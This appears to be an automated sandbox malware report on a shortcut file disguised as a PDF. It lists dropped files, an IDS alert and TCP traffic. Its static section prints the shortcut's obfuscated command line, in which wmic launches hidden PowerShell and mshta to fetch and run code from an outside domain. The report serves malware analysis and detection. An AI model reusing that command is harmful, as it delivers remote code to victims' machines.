                                                                                                                                                                                                        Preview:SessionID=98ccb13a-5e77-4010-b1af-3ec8ee475b73.1734789746520 Timestamp=2024-12-21T09:02:26:520-0500 ThreadID=5652 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=98ccb13a-5e77-4010-b1af-3ec8ee475b73.1734789746520 Timestamp=2024-12-21T09:02:26:521-0500 ThreadID=5652 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=98ccb13a-5e77-4010-b1af-3ec8ee475b73.1734789746520 Timestamp=2024-12-21T09:02:26:521-0500 ThreadID=5652 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=98ccb13a-5e77-4010-b1af-3ec8ee475b73.1734789746520 Timestamp=2024-12-21T09:02:26:521-0500 ThreadID=5652 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=98ccb13a-5e77-4010-b1af-3ec8ee475b73.1734789746520 Timestamp=2024-12-21T09:02:26:521-0500 ThreadID=5652 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):35721
                                                                                                                                                                                                        Entropy (8bit):5.412917736161097
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRY:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRm
                                                                                                                                                                                                        MD5:BCB663F7C9D682CDF1536073DBCF411F
                                                                                                                                                                                                        SHA1:6D67F3E6552DE89D31BE106DA7DFC483CD21F9C7
                                                                                                                                                                                                        SHA-256:6505FF061A4DFFE6ACC466EDEACBA14B163F5B6642449CDAC9B4848D955C0B65
                                                                                                                                                                                                        SHA-512:BF1601856C15E211215AAB5FF7DF0A4B1862D6F269010B077910175F46C0F6542DEFF28349760A69CEC4C143061C0B548F294595D5D3C9B17C21FD6CDA01B2E7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\0084b12a-f93a-4230-8dc1-cb97a34444e7.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1407294
                                                                                                                                                                                                        Entropy (8bit):7.97605879016224
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                                                                                                                                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                                                                                                                                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                                                                                                                                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                                                                                                                                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\548c7d99-096f-460d-9e27-268b8f48c62d.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):758601
                                                                                                                                                                                                        Entropy (8bit):7.98639316555857
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                                                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                                                                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                                                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                                                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\bfad6a40-d454-41ea-b56c-d6da93baed75.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):386528
                                                                                                                                                                                                        Entropy (8bit):7.9736851559892425
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\cb31477f-9588-4ea4-a338-b1fcae85353d.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57837
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1419751
                                                                                                                                                                                                        Entropy (8bit):7.976496077007677
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:/rwYIGNP4mOWL07oBGZSdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07c:TwZG6bWLxBGZS3mlind9i4ufFXpAXkrj
                                                                                                                                                                                                        MD5:4EAEE53509167AAEE3B27D9846E76878
                                                                                                                                                                                                        SHA1:D18F9064065AF57C2E46284112594989BE66A6D0
                                                                                                                                                                                                        SHA-256:147DF04B545EB05724AAD0D90624527352C79C477F5DD188B5AEB15B485FC139
                                                                                                                                                                                                        SHA-512:35D5D521D529F5AB7FB7B09871D62A8150D26A7E4040503B52726D82A4B514F56EAF035CF5B2C629AE8D8B86BC1FBA35CCD8F09351FE335645E15AFAB0EF23E3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                        \Device\ConDrv

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):160
                                                                                                                                                                                                        Entropy (8bit):5.083203110114614
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgkN0qJQAiveyzowv:Yw7gJGWMXJXKSOdYiygKkXe/egkN0qeF
                                                                                                                                                                                                        MD5:CFD8A5893167A6B8383B92BE83D69E48
                                                                                                                                                                                                        SHA1:6CB2B9E743E5BBB1A205F2362D8E2DB9E17361F0
                                                                                                                                                                                                        SHA-256:B5891F8CB649BA20B5F10F4802028D9D1771EDACA29893DCDC7DAECAA3BD63DF
                                                                                                                                                                                                        SHA-512:34AD378847D3C22BF14A641B0BC5870B119CDB9ECB7143C50025598E3C9A4021E2E344AF61F7A41537FF548069A3B2BC17BF10D264DA07A5ADA082463E73553C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 6376;...ReturnValue = 0;..};....

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                                                                                                                        Entropy (8bit):2.6441268654407564
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                                                        File name:Company Information.pdf.lnk
                                                                                                                                                                                                        File size:1'910 bytes
                                                                                                                                                                                                        MD5:945f4a91e15e064475037923ecc3488f
                                                                                                                                                                                                        SHA1:9ef39e345e6ab06dbea4825c1853baad6d678e76
                                                                                                                                                                                                        SHA256:470da05f44f016077661e2335c52801b0ef73e5b37b09adf74a021c292f0d1ca
                                                                                                                                                                                                        SHA512:0addd9535f76746a44028a3336232913ecc502b39c8bb6f14784921c8eb4a9164086d9b73d485b5ccbfea5ee3f2192ea7ec9cef67e82fc0d5555722f5d6cde52
                                                                                                                                                                                                        SSDEEP:24:8AyH/BUlgKN4eH+/3HkWNdk6ZocJSAqdd79dsrabqYnu7AQ:89uGeAHldkUJsdJ9AaeIQ
                                                                                                                                                                                                        TLSH:C5415E105AE90B11F7B38E72587AB310D97F7C89ED638E1C018195892532A10E879F6F
                                                                                                                                                                                                        File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                        Icon Hash:72d282828e8d8dd5

                                                                                                                                                                                                        Static Windows Shortcut Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Relative Path:..\..\..\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                        Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')"
                                                                                                                                                                                                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                        2024-12-21T15:02:25.556249+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.74972384.32.84.121443TCP

                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Dec 21, 2024 15:02:14.868966103 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:14.869019032 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:14.869102001 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:14.970546007 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:14.970583916 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.201940060 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.202020884 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.271210909 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.271226883 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.272197962 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.272258997 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.274629116 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.315339088 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.649046898 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.649101019 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.649132013 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.649166107 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.649166107 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.649193048 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.649213076 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.649213076 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.649234056 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.649239063 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.649286985 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.655522108 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.655585051 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.663669109 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.664320946 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.664329052 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.664385080 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.669508934 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.669564009 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.678858042 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.678929090 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.678961039 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.679007053 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.769663095 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.769722939 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.769746065 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.769788027 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.839540005 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.839601994 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.841856956 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.841907024 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.841985941 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.842026949 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.850126982 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.850176096 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.858449936 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.858505011 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.858527899 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.858587027 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.866800070 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.866883039 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.866890907 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.866940975 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.874815941 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.874876976 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.874929905 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.875004053 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.883059978 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.883133888 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.883266926 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.883325100 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.891453981 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.891505003 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.899578094 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.899621964 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.899631977 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.899672985 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.907759905 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.907805920 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.907860041 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.907908916 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.913543940 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.913592100 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.913598061 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.913639069 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.919167995 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.919217110 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.924804926 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.924901009 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.924909115 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.924949884 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.959017992 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.959064960 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.959147930 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.959192991 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.961844921 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.961904049 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.961913109 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:16.962039948 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:17.031662941 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:17.031747103 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:17.031774998 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:17.031843901 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:17.050760984 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:17.050833941 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:17.051815987 CET4434970284.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:17.051901102 CET49702443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:17.053822041 CET4434970284.32.84.121192.168.2.7
